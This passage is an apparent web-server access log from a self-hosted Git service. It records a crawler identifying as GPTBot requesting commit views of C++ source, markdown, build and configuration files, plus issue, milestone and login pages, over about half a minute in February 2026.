74.7.227.38] [Length 11425] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/main.cpp" +[17/Feb/2026:17:10:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/main.cpp?display=source" [Client 74.7.227.38] [Length 11425] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/main.cpp" +[17/Feb/2026:17:10:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/main.cpp?display=rendered" [Client 74.7.227.38] [Length 10972] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/main.cpp" +[17/Feb/2026:17:10:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/main.cpp?display=rendered" [Client 74.7.227.38] [Length 10972] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/main.cpp" +[17/Feb/2026:17:10:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/main.cpp?display=source" [Client 74.7.227.38] [Length 11398] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/main.cpp" +[17/Feb/2026:17:10:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/main.cpp?display=source" [Client 74.7.227.38] [Length 11425] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/main.cpp" +[17/Feb/2026:17:10:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/main.cpp?display=source" [Client 74.7.227.38] [Length 11423] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/main.cpp" +[17/Feb/2026:17:10:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/main.cpp?display=rendered" [Client 74.7.227.38] [Length 10946] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/main.cpp" +[17/Feb/2026:17:10:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/main.cpp?display=rendered" [Client 74.7.227.38] [Length 10972] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/main.cpp" +[17/Feb/2026:17:10:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/controller-cpp.md?display=rendered" [Client 74.7.227.38] [Length 176781] [Gzip 4.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/controller-cpp.md" +[17/Feb/2026:17:10:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/controller-cpp.md?display=source" [Client 74.7.227.38] [Length 481648] [Gzip 11.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/controller-cpp.md" +[17/Feb/2026:17:10:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/controller-cpp.md?display=rendered" [Client 74.7.227.38] [Length 176814] [Gzip 4.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/controller-cpp.md" +[17/Feb/2026:17:10:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/controller-cpp2.md?display=rendered" [Client 74.7.227.38] [Length 23940] [Gzip 4.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/controller-cpp2.md" +[17/Feb/2026:17:10:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/controller-cpp.md?display=rendered" [Client 74.7.227.38] [Length 176816] [Gzip 4.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/controller-cpp.md" +[17/Feb/2026:17:10:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/controller-cpp2.md?display=rendered" [Client 74.7.227.38] [Length 23943] [Gzip 4.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/controller-cpp2.md" +[17/Feb/2026:17:10:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/controller-cpp2.md?display=source" [Client 74.7.227.38] [Length 56394] [Gzip 9.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/controller-cpp2.md" +[17/Feb/2026:17:10:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/controller-cpp2.md?display=rendered" [Client 74.7.227.38] [Length 23911] [Gzip 4.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/controller-cpp2.md" +[17/Feb/2026:17:10:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/controller-cpp.md?display=rendered" [Client 74.7.227.38] [Length 176817] [Gzip 4.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/controller-cpp.md" +[17/Feb/2026:17:10:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/tsconfig.json?display=rendered" [Client 74.7.227.38] [Length 10882] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/tsconfig.json" +[17/Feb/2026:17:10:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/metadata.json?display=rendered" [Client 74.7.227.38] [Length 10882] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/metadata.json" +[17/Feb/2026:17:10:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/labels?sort=leastissues&state=" [Client 74.7.227.38] [Length 7666] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/labels" +[17/Feb/2026:17:11:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?sort=name&state=all" [Client 74.7.227.38] [Length 8487] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/milestones?q=&sort=name&state=open" +[17/Feb/2026:17:11:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11025] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:17:11:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10121] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=farduedate&state=all&type=all" +[17/Feb/2026:17:11:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?sort=name&state=closed" [Client 74.7.227.38] [Length 8506] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/milestones?q=&sort=name&state=open" +[17/Feb/2026:17:11:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10899] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/.gitignore" +[17/Feb/2026:17:11:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/.gitignore?display=source" [Client 74.7.227.38] [Length 12001] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/.gitignore" +[17/Feb/2026:17:11:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10899] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/.gitignore" +[17/Feb/2026:17:11:04 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json" +[17/Feb/2026:17:11:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json" +[17/Feb/2026:17:11:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11842] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:17:11:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/README.md?display=rendered" [Client 74.7.227.38] [Length 11367] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/README.md" +[17/Feb/2026:17:11:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/README.md?display=rendered" [Client 74.7.227.38] [Length 11367] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/README.md" +[17/Feb/2026:17:11:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html?display=source" [Client 74.7.227.38] [Length 211253] [Gzip 18.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" +[17/Feb/2026:17:11:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 11018] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:17:11:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 11016] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:17:11:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 11016] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:17:11:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 11015] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:17:11:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 11014] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:17:11:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 11016] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:17:11:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 11016] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:17:11:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/README.md?display=source" [Client 74.7.227.38] [Length 11795] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/README.md" +[17/Feb/2026:17:11:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11692] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:17:11:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11693] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:17:11:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11693] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:17:11:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 9970] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" +[17/Feb/2026:17:11:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 9971] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" +[17/Feb/2026:17:11:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 9973] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" +[17/Feb/2026:17:11:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 9970] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" +[17/Feb/2026:17:11:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 9969] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" +[17/Feb/2026:17:11:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 9970] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" +[17/Feb/2026:17:11:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 9971] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 